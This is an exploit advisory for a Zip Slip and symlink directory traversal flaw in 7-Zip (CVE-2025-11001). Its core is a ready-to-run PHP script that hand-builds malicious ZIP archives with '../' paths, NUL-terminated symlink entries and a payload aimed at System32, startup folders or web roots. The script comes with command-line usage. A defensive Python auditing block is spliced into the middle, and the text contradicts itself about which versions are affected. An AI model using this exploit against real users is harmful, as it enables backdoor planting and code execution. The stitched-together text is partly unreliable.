7-Zip version 25.00 contained a critical Zip Slip vulnerability.
This directory traversal flaw allowed malicious archives to write files outside the intended extraction directory. By crafting filenames with `../` sequences within an archive, an attacker could place arbitrary files in sensitive system locations.
The impact ranged from overwriting critical system files to achieving remote code execution (RCE) on the victim's machine. Users extracting such a specially crafted archive with the vulnerable 7-Zip version were at risk.
The vulnerability was promptly addressed. Users were strongly advised to update to a patched version of 7-Zip to mitigate this risk.
=============================================================================================================================================
| # Title : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.7-zip.org/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001
[+] Summary :
Multiple archive extraction implementations, including 7-Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
An attacker can craft a malicious ZIP archive containing:
Directory traversal sequences (../../../)
Symlink entries
Manipulated extra fields
Null-byte terminated link targets
This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.
[+] Vulnerability Class :
Directory Traversal
Arbitrary File Write
Symlink Path Injection
Null-byte truncation bug
[+] Affected Software :
7-Zip < 25.00 (Administrator-only exploitation on Windows)
Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)
Applications that use ZipArchive without proper sanitization
[+] Impact
A malicious ZIP archive allows an attacker to place files in arbitrary locations such as
C:\Windows\System32\
C:\ProgramData\Microsoft\Windows\Start Menu\
/etc/
/var/www/html/
[+] Possible consequences:
Backdoor planting
Privilege escalation
Persistence via startup folders
Overwriting sensitive files
Remote code execution, depending on where the file is written
[+] Technical Details
[+] Core Exploit Mechanism
The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe
or a symlink entry: evil.lnk -> ../../../../Users/Public/Documents\0
These paths bypass validators in 7-Zip and other ZIP extractors when running with elevated privileges.
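A pre-extraction check for the entry types described above, as an added example that is not part of the original advisory or of 7-Zip: it flags traversal names, symlink entries, and link targets that contain a NUL byte or resolve outside the extraction root. It assumes the link target is stored as the entry's data (the Info-ZIP convention) and runs on constructed sample entries; `audit_zip` and `build_sample` are names chosen for this example.

```python
import io
import posixpath
import stat
import zipfile


def _escapes(path: str) -> bool:
    """True if the path is absolute, has a drive prefix, or climbs above its root."""
    path = path.replace("\\", "/")
    norm = posixpath.normpath(path)
    return path.startswith("/") or path[1:2] == ":" or norm == ".." or norm.startswith("../")


def audit_zip(data: bytes) -> dict[str, list[str]]:
    """Map each suspicious entry name to the reasons it was flagged."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            # Name as stored in the archive, with separators normalised to "/".
            name = info.orig_filename.replace("\\", "/")
            issues = []
            if "\x00" in name:
                issues.append("nul-in-name")
            if _escapes(name):
                issues.append("path-escape")
            if stat.S_ISLNK(info.external_attr >> 16):  # Unix mode: high 16 bits
                issues.append("symlink")
                target = zf.read(info).decode("utf-8", "replace")
                if "\x00" in target:
                    issues.append("nul-in-target")
                # Evaluate the target as a NUL-truncating extractor would see it.
                target = target.split("\x00", 1)[0].replace("\\", "/")
                # A relative target resolves from the directory holding the link.
                if target[1:2] == ":" or _escapes(posixpath.join(posixpath.dirname(name), target)):
                    issues.append("symlink-escape")
            if issues:
                findings[name] = issues
    return findings


def build_sample() -> bytes:
    """Constructed sample archive; every entry holds harmless placeholder text."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "ok")
        zf.writestr("../../outside.txt", "placeholder")
        for name, target in (("docs/link", "../../../elsewhere\x00"), ("docs/inner", "readme.txt")):
            link = zipfile.ZipInfo(name)
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, target)
    return buf.getvalue()
```

Run `audit_zip` on untrusted archives before extraction and reject or quarantine any archive with findings; a bare `symlink` finding means the link stays inside the root but still deserves review.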
[+] PoC :
<?php
/*
===========================================================
By Indoushka (Nekaa Salah eddine)
===========================================================
*/
/* ===========================================================
MODE 1 - Basic Zip Slip Exploit
(Former: build_zip duplicated 4 times)
=========================================================== */
function poc_zip_slip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }
$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;
$zip = new ZipArchive();
if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
die("[-] Failed to create ZIP\n");
}
$zip->addFromString($traversal . $payload_name, $payload_data);
$zip->close();
echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
}
/* ===========================================================
MODE 2 - Manual Symlink ZIP Creator
=========================================================== */
function poc_symlink_zip($target_path, $output_zip)
{
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;
$name = "evil.lnk";
$link = $traversal . "\x00";
$extra = pack("v", 0x756e);
$extra .= pack("v", strlen($link));
$extra .= $link;
$local = pack("VvvvvvVVVvv",
0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,
strlen($name), strlen($extra)
);
file_put_contents($output_zip, $local . $name . $extra);
echo "[+] PoC: Symlink ZIP created: $output_zip\n";
}
/* ===========================================================
MODE 3 - Full Manual ZIP Builder (Symlink + Payload)
=========================================================== */
function poc_manual_zip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }
$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$trav = "../../../../" . $target;
$ln_name = "evil.lnk";
$ln_target = $trav . "\x00";
$ln_extra = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;
$f = fopen($output_zip, "wb");
$off = 0;
// Local: Symlink
$h1 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
);
fwrite($f, $h1.$ln_name.$ln_extra);
$symlink_offset = $off;
$off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);
// Local: Payload
$h2 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0,0,0,0,strlen($payload_data),strlen($payload_data),
strlen($payload_name),0
);
fwrite($f, $h2.$payload_name.$payload_data);
$payload_offset = $off;
$off += strlen($h2)+strlen($payload_name)+strlen($payload_data);
// Central Directory
$cd_start = $off;
// CD: Symlink
$cd1 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
strlen($ln_name),strlen($ln_extra),0,0,0,(0777<<16)|0xA1ED,$symlink_offset
);
fwrite($f, $cd1.$ln_name.$ln_extra);
// CD: Payload
$cd2 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,0,
strlen($payload_data),strlen($payload_data),
strlen($payload_name),0,0,0,0,(0777<<16),$payload_offset
);
fwrite($f, $cd2.$payload_name);
// EOCD
$eocd = pack("VvvvvVVv",
0x06054b50,0,0,2,2,$off,$cd_start,0
);
fwrite($f, $eocd);
fclose($f);
echo "[+] PoC: Manual ZIP generated: $output_zip\n";
}
/* ===========================================================
MODE 4 - CVE-2025-11001 (7-Zip Directory Traversal)
=========================================================== */
function poc_cve_2025_11001($target, $payload, $output)
{
poc_manual_zip($target, $payload, $output);
echo "[+] CVE-2025-11001 Archive Ready\n";
}
/* ===========================================================
CLI Controller
=========================================================== */
if (php_sapi_name() == "cli")
{
$args = getopt("", [
"mode:",
"target:",
"payload::",
"output::"
]);
if (!isset($args["mode"])) {
die("Usage:\n
php exploit.php --mode=zip-slip --target=DIR --payload=file --output=out.zip
php exploit.php --mode=symlink --target=DIR --output=out.zip
php exploit.php --mode=manual --target=DIR --payload=file --output=out.zip
php exploit.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
");
}
$mode = $args["mode"];
$target = $args["target"] ?? null;
$payload= $args["payload"] ?? null;
$output = $args["output"] ?? "exploit.zip";
switch ($mode) {
case "zip-slip":
poc_zip_slip($target, $payload, $output);
break;
case "symlink":
poc_symlink_zip($target, $output);
break;
case "manual":
poc_manual_zip($target, $payload, $output);
break;
case "cve-2025-11001":
poc_cve_2025_11001($target, $payload, $output);
break;
default:
echo "Unknown mode.\n";
}
}
?>
Save as : poc.php
run : php poc.php
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
7-Zip 25.00 Zip Slip Directory Traversal
- Written by: khalil shreateh